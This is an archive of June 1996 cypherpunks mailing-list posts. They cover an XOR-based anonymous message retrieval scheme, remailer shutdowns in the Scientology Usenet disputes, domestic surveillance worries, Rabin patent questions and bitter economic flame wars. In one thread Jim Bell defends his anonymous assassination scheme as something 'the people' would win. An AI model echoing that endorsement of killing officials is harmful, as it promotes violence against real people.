In-Reply-To: <199606080730.AAA24004@netcom13.netcom.com>
Message-ID: <Pine.SV4.3.91.960608143037.10776F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


> REAL crypto-anarchists, 

  Like the folks who brought us Tiannemen Square?

> of course, want the 
> destruction of copyrights, trademarks, and
> other weapons of capitali$m, and will





> Kill your Television

   Threw mine out in 1987. There's more people who don't have indoor
bathrooms, than don't have a TV. (source: 1990 Bureau of the Census). I'm
in a pretty elite group. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Sun, 9 Jun 1996 07:40:48 +0800
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199606081816.LAA24268@mail.pacifier.com>
Message-ID: <doug-9605082008.AA00025852@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain




>While I appreciate your...uh...appreciation, let me remind you that part of 
>my "pronouncements" are that the current political and social system is 
>sick.  Many people around here seem to agree with this assessment.  What I 
>advocate is a comparatively simple change in the rules that could have the 
>effect of vastly changing the way things are done.  Whether these changes 
>are in "the best interests of the inhabitants of this nation" is still an 
>open question, and many people have agreed with me on this matter. 
>
>Jim Bell
>jimbell@pacifier.com
>
>
>

Hmm....

Assissination Politics: "Curing the sickness by killing the patient"

;)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sun, 9 Jun 1996 11:14:24 +0800
To: cypherpunks@toad.com
Subject: Anonymous return addresses
Message-ID: <199606082329.QAA14538@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Browsing through the 1995 IEEE Symposium on Security and Privacy
proceedings at the library, I found two articles of interest here.  The
first, "Preserving Privacy in a Network of Mobile Computers", is really a
method for anonymously receiving mail via reading it from a large
database such that no one knows which part you are reading.  This is a
topic which we discussed here at some length a year or two ago, but I
think this article has a new idea about it which I will discuss below.

The other one was "Holding Intruders Accountable on the Internet" and it
had one strange comment.  Basically it was about a way of trying to track
down cracker types who break into systems.  One strategy these people use
is to log into a whole series of insecure hosts, one after the other,
before attacking their target.  Then tracing back where they came from is
very difficult.  Cliff Stoll's "The Cuckoo's Egg" is the classic account
of how hard it is to trace these people.  Probably the new books about
Mitnick talk about the same thing.

The idea in this article is that you monitor the whole net and track
all the rlogin and telnet traffic between pairs of hosts.  Then they
describe a statistical technique for determining that two different
telnet sessions are chained together by recognizing the same patterns
of traffic on them.  Basically they count the frequency of spaces and
punctuation marks on minute-long time slices and try to correlate
them.  This way you can tell that the intruder attacking here is also
using these other hosts over there, and try to track him down that
way.

I don't think this is very practical, and I have mixed feelings about the
technology - I don't favor breakins, but the kinds of surveillance that
would be necessary to implement their technique seem very threatening.
Also they do mention the obvious countermeasure of using encryption at
each stage, which would be easy with such things as the secure remote
shell programs around now.

The interesting comment came when they were discussing an alternative
scheme, which would be to have all hosts keep track of their incoming and
outgoing connections:  "The difficulty with all such host-based tracing
systems is that, when an extended connection crosses a host which is not
running the system, accountability is altogether lost at that point....
Even if most hosts could be secured, the intruder community could easily
maintain a set of machines to launder connections, just as they maintain
anonymous remailers."

So apparently in the view of these authors anonymous remailers are
maintained by "the intruder community."  It is unfortunate that we have
this image among some member of the larger community.  BTW, there are
periodic suggestions here to run general-purpose connection redirectors,
but people should be aware of the problem that cracker types would seize
on these as another shield for their crimes.  These would have to be
limited to specific uses, such as port 80 which is the http port and
which hopefully can't easily be used for attacks.

In any case, let me describe the message-receipt idea from the other paper
I mentioned above, which is by David A. Cooper and Kenneth P. Birman of
Cornell.  They have a few ideas, among them exchanging message labels
for the next message in an ongoing conversation, so that later messages
don't have any identifying information on them, but just opaque message
labels which can be scanned for matches to those of interest.  This is a
concept we have discussed before.  However you still have the problem
at least for the first message to an anonymous recipient of getting it to
him anonymously even though the message says what pseudonym it is for.

A simple idea is to put all such messages into a database and to let
everyone scan the message headers to see whom they are for.  Then when
they see one for them they download, decrypt, and read it.  For more
security, let the database machine be trusted, and let the download
request and response be sent encrypted.  Now only the database machine
knows which person asked for which message.  This provides a level of
security analogous to sending through a single remailer.

(Another idea is to download all messages, but that is generally
infeasable if there are a lot of people using the system.)

The new idea is to use multiple databases to get security similar to
using multiple remailers.  I'll describe it using two machines.  Each
holds a database of messages, and the two databases are exactly alike.
Some mechanism keeps the two synchronized.  Furthermore, all the
messages need to be the same size.  There will need to be some padding
and fragmentation/assembly mechanism to arrange for this.

Someone who wants to receive some mail anonymously first downloads all
the message headers as before, and determines which messages are for
them.  Suppose just one is, and it is message number 20 out of a database
of, say, 50 messages.  Now what the reader does is to choose a random 50
bit number (where 50 is the total number of messages in the database).
He makes a copy of this number, and toggles bit 20 in one of them (20 is
the message he wants to receive).  Then he sends one number to one of the
database servers, and the other to the other server.  Each one receives a
random-looking 50 bit number.

What each server does is to take the messages from the database which
correspondo to 1 bits in the 50 bit number, and XOR all those messages
together, byte for byte.  The resulting output will be the same size as
a quantized message.  It is sent, encrypted, back to the requestor.

Now all he does is to XOR the two messages he got back from the servers.
All of them will cancel out except for message 20, which is the one he
wants.  This can be generalized to more than two servers, by creating
multiple bit strings and arranging so that the XOR of all of them will
just leave the bit set for the message he wants.  If he wants more than
one message the protocol has to be repeated separately for each message.

There is no large amount of traffic needed, as each server only sends an
amount of data equal to one message.  The individual servers do not get
any information about which message the requestor wants (other than that
it is one of the 50).  Only by colluding and XOR'ing their bit strings
can they figure that out.  The same kind of collusion is needed to trace
a sent message using two remailers, so the security is similar to what we
get sending messages.

Messages would have a finite lifetime and would expire and be removed
from the database after a while.  The authors propose breaking the
database up into batches with a fixed number of messages, but I don't
fully follow the reasoning behind this.  I guess it reduces the load on
the server when it does its XOR's.

I'm not sure whether this particular scheme was proposed when we
discussed this concept in the past, but it does seem like an interesting
alternative way to receive messages.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Sun, 9 Jun 1996 11:06:12 +0800
To: cypherpunks@toad.com
Subject: Clam Wars
In-Reply-To: <aRk8oD61w165w@bwalk.dm.com>
Message-ID: <199606082344.QAA04566@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


LD editorializes:

 > I haven't been paying a lot of attention to the Church of
 > $cientology wars until recently. Here's an executive
 > summary for those who don't give a damn.

Uh huh.

 > 1. There's a gang of flamers (David Gerard, Jon Noring, Ron
 > Newman, Rob J. Nauta, and the like) who try to stop
 > $cientologists from discussing their religion on the Usenet
 > newsgroup alt.religion.scientology. Most of them are
 > disgruntled former cult members and/or members of other
 > similar cults.

Actually, from my infrequent and cursory reading of a.r.s, it is
my impression that the antis are discussing their own views of
Scientology, not trying to prevent anyone else from discussing
theirs.  I would think all opinions related to Scientology would
be on-topic for a.r.s., both positive and negative.

 > 2. The anti-scientologists have caused many cypherpunks
 > anonymous remailers to shut down via their egotistical
 > misuse of them, viz. criminally posting copyrighted Co$
 > writings to Usenet. They did it knowing that the Co$ is
 > likely to harrass the remailer operators, causing them to
 > shut down and depriving everyone of their services.

Well, perhaps.  It certainly isn't very nice to post copyrighted
works via anon remailers.  At least not more than constitutes
"fair use" for the purpose of critical review (or hilarious
laughter, as the case may be).

 > 3. These harrassers are Usenet Cabal supporters, and they
 > are sometimes joined by initerant cabal enforcers such as
 > Peter Vorobieff, who visit a.r.s to lend a helping hand and
 > to flame Co$.

Nothing wrong here.  Flames are the thread from which the fabric
of Usenet is woven.

 > 4. Recently the anti-scientologists have asked me for a
 > copy of my cancelbot, and have been using it to forge
 > cancels for scientologist posts on a.r.s.

It should be noted that said Scientologist posts consist of
thousands of distinct little snippets from the Scientologist
Handbook and other similar tracts, posted as separate articles
from multiple accounts simultaneously.  This is clearly an
attempt to flood everything else off servers while staying clear
of the current definitions of Spam and Velveeta.

While Usenet tends to frown on content-based cancels, I find it
difficult to understand why the cancellation of thousands of
gratuitous posts duplicated amongst a large number of accounts
should be considered "content-based." Does participation in
a.r.s. ever legitimately require this level of posting?  It
shouldn't be too difficult to find non-content-based criteria for
cancelling this crap.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 9 Jun 1996 12:00:44 +0800
To: ichudov@algebra.com (Igor Chudov)
Subject: Re:
Message-ID: <199606090006.RAA05123@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:09 PM 6/8/96 -0500, Igor Chudov @ home wrote:
>jim bell wrote:
>> 
>> While I appreciate your...uh...appreciation, let me remind you that part of 
>> my "pronouncements" are that the current political and social system is 
>> sick.  Many people around here seem to agree with this assessment.  What I 
>> advocate is a comparatively simple change in the rules that could have the 
>> effect of vastly changing the way things are done.  Whether these changes 
>> are in "the best interests of the inhabitants of this nation" is still an 
>> open question, and many people have agreed with me on this matter. 
>> 
>
>Since corrupt officials are likely to have more anonymous cash that
>phreedom phighters, guess who will win.


The people, that's who.  The reason is that while "corrupt officials" may 
have more money, per person, that ordinary citizens, there are FAR more 
ordinary citizens than officials.  Further, these corrupt officials only 
have more money because they rob it from ordinary citizens, which means that 
they start out the game hated by the public.

Finally, officials are, by definition, identified or identifiable, while 
disaffected citizens are not.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous User <nobody@c2.org>
Date: Sun, 9 Jun 1996 11:20:00 +0800
To: cypherpunks@toad.com
Subject: Re: NSA/CIA to snoop INSIDE the U.S.???
Message-ID: <199606090005.RAA17235@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


: This is a fucking big story.
: Allowing the CIA and NSA to snoop domestically, and using only a handful of
: suspicions and anecdotes about cybernastiness and evil cryptohackers to
: justify this major policy shift -- well, it's fucking amazing.
: Nunn's proposal, unfortunately, was more than a "suggestion."

This is very serious. Why has there not been more discussion about 
this on the list?

How close/far is this from becoming law?

If they are now trying to make it legal for the CIA and NSA to snoop 
inside the US  I would guess that it's happening already. Remember
wiretaps? Do it now and they will make it legal later.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 9 Jun 1996 09:20:02 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re:
In-Reply-To: <199606081816.LAA24268@mail.pacifier.com>
Message-ID: <199606082209.RAA19856@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:
> 
> While I appreciate your...uh...appreciation, let me remind you that part of 
> my "pronouncements" are that the current political and social system is 
> sick.  Many people around here seem to agree with this assessment.  What I 
> advocate is a comparatively simple change in the rules that could have the 
> effect of vastly changing the way things are done.  Whether these changes 
> are in "the best interests of the inhabitants of this nation" is still an 
> open question, and many people have agreed with me on this matter. 
> 

Since corrupt officials are likely to have more anonymous cash that
phreedom phighters, guess who will win.

Also, think about this: lots of people have someone they'd like
to assassinate but do not actually do it because of lack of anonymity
and associated hassles (like dealing with assassins non-anonymously,
abundance of traces, possible confession of the assassin and so on).
With your assassination clearinghouse these hassles go away. I think it
would present an excellent prospect for reducing the population.

Maybe *that* will help the whales and trees, because of the effect on demand.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sun, 9 Jun 1996 09:05:50 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
In-Reply-To: <199606082022.NAA20567@web.azstarnet.com>
Message-ID: <9606082133.AA05913@Etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



>usually, people just call me Davve.

Unusual to spell Dave with two v's, were your parents also dyslexic?

How about everyone holding off on the spelling flames for a while?


Having discovered from Hal Finnley that you US types do not lump together 
derivatives based on futures when you refer to futures I think I now understand 
the point Perry was originaly trying to make. Yes speculating in ordinary 
futures, one would normally expect a return of about the same as the margin put 
up. Does anyone have a first hand report of the precise contracts being traded? 
There appear to be no details on the Web that Alta Vista has access to.

Of course if Perry and his cohorts were not so keen to call people drivelling 
idiots we would have got to this point rather earlier. 

I have a habit of not valuing very highly claims from people who feel they have 
to resort to insults to get an argument across. Perry's mode of argument appears 
to be the automatic gainsaying of whatever the other person says - not too 
helpfull.


I'm still at a loss to see why Bob thinks I have anything whatsoever to do with 
the Social Text people. I've never accepted any of the Derrida type stuff and 
have metaphysical and linguistic objections to that approach based in the theory 
they are alledgedly advancing. 


		Phill







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 9 Jun 1996 02:52:37 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199606081538.RAA19160@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Russ of nelson@crynwr.com apparently writes:

:"Well, you aren't being
:carried off in the middle of the night by death squads, so I'm :not going to waste my time on you when I could help other people :in danger of death."  I'm not prepared to argue against that :judgement.

I am.

Russ, this rant is not directed at you. I'm just weary of the Bell-bashing.

Perhaps the reason that our society has evolved to the point of not having to fear deathsquads is because of assholes like Bell who keep prodding us to expand the limits of personal liberty and free speech by their rantings.  He makes me think; sometimes the unthinkable, and gives me the opportunity to _reject_ his ideas.

Each time I suggest that someone goes *a little too far,* I draw in the circle of my own protected speech a bit more. *My God, he can't say that!" He _may_ be an adult who knows and accepts the possible consequences of his speech. 

Notice the chilling effect on virtually any discussion when the threat of legal action is suggested.  There's the danger.

Read the entire quote by Donne.  *...any man's death diminishes me, because I am involved in mankind;...*  By protecting Bell's right to speak what he thinks, we serve as an example to the rest of the world of what personal freedom really means. *Those crazy Americans* 

Bell gives me the opportunity to say that his pronouncements are antithetical to the best interests of the _inhabitants_ of this nation, not simply the government itself.


Thank you, Jim.    






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: strick at Jihad <strick@jihad.yak.net>
Date: Sun, 9 Jun 1996 06:38:31 +0800
To: cypherpunks@toad.com
Subject: need meeting location
Message-ID: <199606081835.SAA00155@jihad.yak.net>
MIME-Version: 1.0
Content-Type: text/plain


hey, could a few of you forward me the location 
of the bay area meeting today .... sorry to bother you,
but the ftp server seems to be down ...    thanks,,,, strick@yak.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 9 Jun 1996 09:51:33 +0800
To: hallam@etna.ai.mit.edu
Subject: Re: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
In-Reply-To: <9606081830.AA05221@Etna.ai.mit.edu>
Message-ID: <199606082240.SAA21523@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



hallam@Etna.ai.mit.edu writes:
>Apart from hero worship why do you believe that Friedman is not able to say 
>anything ridiculous?

Because I've read vast chunks of the corpus of his writings and the
comment you attribute to him sounds about as much in character as, say,
Jesse Helms announcing that he's in favor of gay marriages. Its
POSSIBLE that it could happen, but its not bloody likely.

He's said many things that I disagree with -- his contentions about
fixed rule central banking seem specious, for instance -- but I've
never heard him say or write anything out of character.

>Since you were so certain that Hess was not a staff member of the
>Cato institute despite being listed as such on their home page

He isn't. My whole point about P.J. O'Rourke should have made that
point, but you just spewed inanities about telecommuting. You
obviously had no idea where he worked even though I dropped the major
sarcastic hint that it was Rolling Stone, and not Cato. Never mind. I
suppose your sense of sarcasm is also impaired.

You have contended that Hillary Clinton traded options when she traded
futures.

You have contended that Hillary Clinton was trading in margin when the
facts were that she was trading out of margin.

You have contended that Hillary Clinton was trading lots of under
$20,000 when she was trading vastly larger sizes.

You obviously didn't examine the situation yourself at all.

However, having a doctorate in an unrelated field, you apparently
believe that you are able to make pronouncements in the absense of
facts. Later in your message, you accused the free market faction of
being "academic".

>Plus, to say that such an analysis would be out of line with "even
>the most fuzzy headed free market types" is somewhat rich. I have
>heard plans to eliminate all government apart from the army,
>privatising roads and the police.

Yes, but since you don't understand how free markets work or how free
market types think you can't reason about them.

Put it this way -- communists say really outrageous things, right?
Well, would it be in character for a communist to go out and endorse
joint stock companies as a primary mechanism for distributing factory
profits?

Just because someone says something you consider weird doesn't mean
they aren't thinking in a systematic fashion, and doesn't mean that
certain things are and are not out of character. Over and over again,
however, you have betrayed a fundamental ignorance of the arguments
free marketeers use. It is one thing to disagree with someone, but it
is another thing to mischaracterize them. I've read lots of Marx and
Lenin, but it doesn't seem like you've bothered to read the writings
of even fairly mainstream economists.

>I have heard numerous claims that monopolies cannot ever exist under
>any circumstances unless they are created by government.

I've never heard that, but I myself have made the argument that they
are very rare without government intervention. Its a simple fact of
the world -- if you disagree with me you are disagreeing with the
historical record. I can name the real cases of monopoly that have
sprung up over the decades -- Alcoa being about the best example.
You probably can't name any to speak of, other than tired and fake
examples like U.S. Steel.

>I have even heard it stated that had gun ownership been more widespread 
>in the UK the Dunblane massacre would not have occurred.
>Whether the teacher was expected to gun down Hamilton with the
>Kalashnikov she carried to school each day

Of course, thank goodness the U.K. has some of the strictest gun
control in the world, since it stops these sorts of
incidents. (I'll point out for Dr. Hallam-Baker's benefit that this
sentence was "sarcasm".)

And yes, if she'd been carrying not a Kalashnikov rifle but just a
simple pistol in her pocket she might indeed have been able to shoot
the guy. I realize this may come as a shock to you, but in a fire
fight the winner is the guy who fires accurately first, not the guy
with the longer gun. Of course, you prefer to use distortionary
language (like refering to carrying a rifle) to make things look
ridiculous when in fact non-silly alternatives are possible.

>How to save the whales is a logical outcome of Friedman's thesis that markets 
>are everything.

Since you are either misreporting or inventing the comments you
attribute to Friedman and can neither cite the actual article nor
produce quotes from it, I don't think its entirely fair for you to
make claims about his position.

>The flaw in Perry's "stakeholder" theory is the same one in many
>academic theories. It assumes that most people are smart enough to
>realise their true interests.

Since in practice it always works, and since the alternatives never
do, I would say that the collectivists of the world, such as yourself,
are the academics here.

Amazing how time after time even weak Adam Smithian analysis works
just fine. Impose price controls on gasoline, and watch shortages form
when supplies change, as in 1973. Remove price controls, and watch
shortages disappear. Substantially lower the income tax, growth goes
up. Substantially raise it, growth goes down. Make alchohol illegal,
watch criminals take over the market. Make it legal again, watch the
problems go away.

No, Dr. Phill Hallam-Baker, D.Phil., who can't name whether Hillary
Clinton traded options or futures and never examined a single trade
she made but who can give us details about how those of us who looked
at the thing in detail are wrong when we say her trades were
impossible, it is you who is the academic high in your ivory tower
with no sense of reality whatsoever.

Ask all the people defecting from Cuba if they think your way is
better some time. Be prepared to wipe the spit off your face.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drose@azstarnet.com
Date: Sun, 9 Jun 1996 15:15:13 +0800
To: cypherpunks@toad.com
Subject: Re: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
Message-ID: <199606090200.TAA26296@web.azstarnet.com>
MIME-Version: 1.0
Content-Type: text/plain


hallam@Etna.ai.mit.edu wrote:

>>usually, people just call me Davve.
>
>Unusual to spell Dave with two v's, were your parents also dyslexic?

Er, Phill (if I may make so bold, sir--arggh, treasure ahead laddies), I'm
being a tad sarcastic, Phillll. Get it?

Frankly, my wanker/tosspot amigo, I am more than a bit sick of your
self-professed ignorance. And your ad hominem attacks don't amount to a hill
of beans.

I am more than through with you.  Perhaps Perry has more patience.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 9 Jun 1996 10:32:10 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Whalepunks, Marginpunks, Gunpunks, Clintonpunks, and Politics
In-Reply-To: <addf243d040210043520@[205.199.118.202]>
Message-ID: <199606082322.TAA21596@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Timothy C. May writes:
> In general, I think Phill raises some good points about the efficiency of
> free markets. However, I doubt that Cypherpunks is the proper forum for
> debating economic theory, for various reasons.
[...]
> However, the reason many of us don't jump in and write defenses of free
> markets here (and I would not have except to make my transhumanist joke--so
> sue me) is that this list is not "Libernet" nor any of the similar
> political discussion lists.

Am I the only person who finds this comment, in context, howlingly funny?

> Secondly, there is almost zero chance that any of us will have our
> views changed by such political arguments, so why bother?

Mine were many years ago -- 

> But arguing the merits of capitalism vs. socialism, for example, has rarely
> been fruitful in the past 10 years of the Usenet,

And I know of other people who's ideas were changed by such
discussions. A couple of them subscribe to this list.

In any case, Tim, this *is* now the sewer list, the place where
anything at all may be flushed by the inhabitants, partially as a result
of your own lobbying against "Perrygrams" and such. I understand that
many do not like the taste of their own drek, but hey, its what you
asked for. Repeatedly, you stood your ground and staked your claim and
said "no one will tell ME what to do", and well, you got what you
wanted.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Sun, 9 Jun 1996 12:16:41 +0800
To: jimbell@pacifier.com (jim bell)
Subject: Re:
In-Reply-To: <199606090006.RAA05123@mail.pacifier.com>
Message-ID: <199606090034.TAA20636@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


jim bell wrote:
> At 05:09 PM 6/8/96 -0500, Igor Chudov @ home wrote:
> >
> >Since corrupt officials are likely to have more anonymous cash that
> >phreedom phighters, guess who will win.
> 
> The people, that's who.  The reason is that while "corrupt officials" may 
> have more money, per person, that ordinary citizens, there are FAR more 
> ordinary citizens than officials.  Further, these corrupt officials only 
> have more money because they rob it from ordinary citizens, which means that 
> they start out the game hated by the public.

You haven't seen _real_ corrupt officials. :)

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sun, 9 Jun 1996 12:01:45 +0800
To: cypherpunks@toad.com
Subject: Elementrix Snake Oil Spam...
Message-ID: <v03006f0baddfc7ed055b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Was it just me, or did others on this list get three whopping MS Word docs
sent to them from the POTP snake-oil folks?

Came from one Charles W. Morgan, <charlie@outcomesinc.com>, of "Outcomes
2000, Inc.", whoever *that* is...  Probably somebody trying to give the
Albuquerque Spam King a run for his money, I bet.

Feh!


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"If they could 'just pass a few more laws',
  we would all be criminals."    --Vinnie Moscaritolo
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: foodie@netcom.com (Jamie Lawrence)
Date: Sun, 9 Jun 1996 15:31:25 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Reference Correction Re: Thank you for the Archives 100 messages
Message-ID: <v02140b02ade008e3f040@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain



Careful Alan; I didn't write that.

That was qut@netcom.com, the latest addition to my killfile,
who replied to my private email on Cypherpunks, and, rather oddly,
called me a Mormon.

Message in question appended.

-j

>> REAL crypto-anarchists,
>
>  Like the folks who brought us Tiannemen Square?
>
>> of course, want the
>> destruction of copyrights, trademarks, and
>> other weapons of capitali$m, and will
>
>
>
>
>
>> Kill your Television
>
>   Threw mine out in 1987. There's more people who don't have indoor
>bathrooms, than don't have a TV. (source: 1990 Bureau of the Census). I'm
>in a pretty elite group.


------------------

Return-Path: <qut>
Received: (from qut@localhost) by netcom13.netcom.com (8.6.13/Netcom)
        id AAA24004; Sat, 8 Jun 1996 00:30:50 -0700
From: qut (Be Good)
Message-Id: <199606080730.AAA24004@netcom13.netcom.com>
Subject: Re: Thank you for the Archives 100 messages
To: foodie@netcom.com
Date: Sat, 8 Jun 1996 00:30:50 -0700 (PDT)
Cc: cypherpunks@toad.com
Reply-To: foodie@netcom.com
In-Reply-To: <31B91EA0.16F@netcom.com> from "Jamie Lawrence" at Jun 7, 96
10:33:09 pm
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1582

> qut4.qut@netcom.com wrote:
> >
> > Apologies, but rich has deleted me from
> > his mailboxes, and for a few days now,
>
> As I have, too, now.
>
> > somebody has placed a global cancel bot on
> > me.  I'm gonna have plenty of fun figuring
> > this out.  Kwow any good sniffers?
>
> I'm glad! If my processor/filtering software doesn't
> have to deal with your garbage, that's more time I have
> to spend with folks who have something to say.

The only thing your type of "cypherpunk" has
to say, is blather about liability, copyrights,
and other capitali$t bs.

REAL crypto-anarchists, of course, want the
destruction of copyrights, trademarks, and
other weapons of capitali$m, and will
implement crypto-anonymonity to proceed
forthwith.

> No, I don't know of any better "sniffers" (I assume you
> mean, "software that can detect a cancelbot"), as such
> software is impossible to detect. Of course, unless Rich
> (or whomever cares so much about a moron) has either root
> on toad.com, or at least as many resources as the NSA, he
> can't cancel your mail to Cypherpunks (or anywhere else).

I was talking about netnews, mormon.

> > I agree the list should be public usenet:
> > A mail gate-way to a usenet group that
> > ALSO permits unmoderated posts.  This
> > would be a nice way to combine a strict
> > moderated mail-list, with a standard
> > netnews group.
>
> Er, what?
>
> That paragraph makes absolutely no sense whatsoever.

There's already hundreds of groups like
that, stupid.  It will be implemented,
whether you like it or not.


--

Kill Your Television



--
The signal is the noise.
____________________________________________________________________
Jamie Lawrence   mailto:jal@cyborganic.net  mailto:foodie@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sun, 9 Jun 1996 13:44:34 +0800
To: cypherpunks@toad.com
Subject: Rabin patented?
Message-ID: <Pine.LNX.3.93.960608220851.129A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Is Rabin encryption patented?  I have never heard of any patent covering Rabin
encryption, but I have also heard that Diffie-Hellman will be the first PK
algorithm that is patent-free when the patent expires in '97.  I know that
until recently, ElGamal was considered to be covered under the DH patent.  I
wonder if the same is also true for Rabin.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"In Christianity neither morality nor religion come into contact with
reality at any point."
                -- Friedrich Nietzsche


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMbozMrZc+sv5siulAQH2ugP8C0ymdTJJLUa9NQxj7ahkcGD/u0tFZWfN
DtMDRm08b0aupADNgDntn7ZHAZKXo5RRAClLfvB3Z/gIGMbqAQKFMItSN7CbJ4k1
osY2enhnrDN840LH0jQmC/dS0MjVWh5CaC3R9SqHqhiu5S5oZUP4fAJhIyDMcQuo
VLGUQzLZVxs=
=P3wZ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 9 Jun 1996 16:31:17 +0800
To: cypherpunks@toad.com
Subject: Re: Clam Wars
Message-ID: <199606090513.WAA08328@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


 > 2. The anti-scientologists have caused many cypherpunks
 > anonymous remailers to shut down via their egotistical
 > misuse of them, viz. criminally posting copyrighted Co$
 > writings to Usenet. They did it knowing that the Co$ is
 > likely to harrass the remailer operators, causing them to
 > shut down and depriving everyone of their services.

This scenario is beginning to sound suspiciously similar each time
it happens:  an anonymous individual or individuals utilize a
remailer in a way that's deemed abusive, certain individuals
complain loudly, and the remailer (or mail2news gateway) either
shuts down or blocks the affected newsgroup.  Thus far I've seen it
happen with the alt.religion.scientology, alt.smokers, and
alt.syntax.tactical newsgroups.

This is setting a bad precedent.  It sends the message that you
merely have to fabricate a little "abuse" through one or more
remailers to get what you want -- the elimination of your opponents'
platform to dissent without fear of retribution.  Whether the abuse
in any of the aforementioned instances was actually fabricated or
not is immaterial.  If it wasn't, it very could have been, with
identical results in either case.  The problem being, with an
anonymous attack through a remailer and/or mail2news gateway, how do
you identify the intended victim?  Was it the NG or the
remailer/gateway itself?

The first two NGs have one striking similarity:  both involve a
product or service where those who stand to profit from it have
recently been plagued with "whistle blowers" and "defectors" from
among their ranks -- the CO$ and the tobacco industry.  In both
cases, those who've come forward and divulged secrets have reported
harassment.

I'm at a loss to understand the blocking of the third NG,
alt.syntax.tactical, however, unless the intent was strictly
punitive.  I can't imagine anyone from a.s.t. coming forward to
complain about "abuse"!  That would be like complaining about foul
language on alt.blasphemy.  <g>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jamesd@echeque.com
Date: Sun, 9 Jun 1996 16:50:25 +0800
To: Asgaard <cypherpunks@toad.com
Subject: Re: Anonymous stock trades.
Message-ID: <199606090521.WAA14979@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:25 AM 6/8/96 +0200, Asgaard wrote:
> Who is going to assure that someone has an ownership stake in the
> Humpback Whales? The World Government?

Brand them and herd them like open range cattle:  The west did not
need a government to do that, though they did need to hang a few
folk who favored a different method of open ranging.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@Etna.ai.mit.edu
Date: Sun, 9 Jun 1996 14:29:23 +0800
To: perry@piermont.com
Subject: Re: [NOISE] Buying whales with digicash Re: Anonymous stock trades.
In-Reply-To: <199606082240.SAA21523@jekyll.piermont.com>
Message-ID: <9606090229.AA06296@Etna.ai.mit.edu>
